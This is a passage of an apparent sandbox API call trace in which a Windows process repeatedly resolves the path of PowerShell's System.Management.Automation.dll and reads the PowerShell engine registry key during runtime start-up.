lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.494] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.495] GetCurrentProcessId () returned 0xa08 [0092.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.523] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dbb8 | out: phkResult=0x16dbb8*=0x3a8) returned 0x0 [0092.523] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16db3c, lpData=0x0, lpcbData=0x16db38*=0x0 | out: lpType=0x16db3c*=0x1, lpData=0x0, lpcbData=0x16db38*=0x56) returned 0x0 [0092.523] CoTaskMemAlloc (cb=0x5a) returned 0x30c300 [0092.523] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16db0c, lpData=0x30c300, lpcbData=0x16db08*=0x56 | out: lpType=0x16db0c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16db08*=0x56) returned 0x0 [0092.523] CoTaskMemFree (pv=0x30c300) [0092.524] RegCloseKey (hKey=0x3a8) returned 0x0 [0092.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.533] CoTaskMemAlloc (cb=0x104) returned 0x2e4120 [0092.533] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4120, nSize=0x80 | out: lpBuffer="") returned 0x0 [0092.533] CoTaskMemFree (pv=0x2e4120) [0092.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0092.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c600, lpFilePart=0x0 | out: 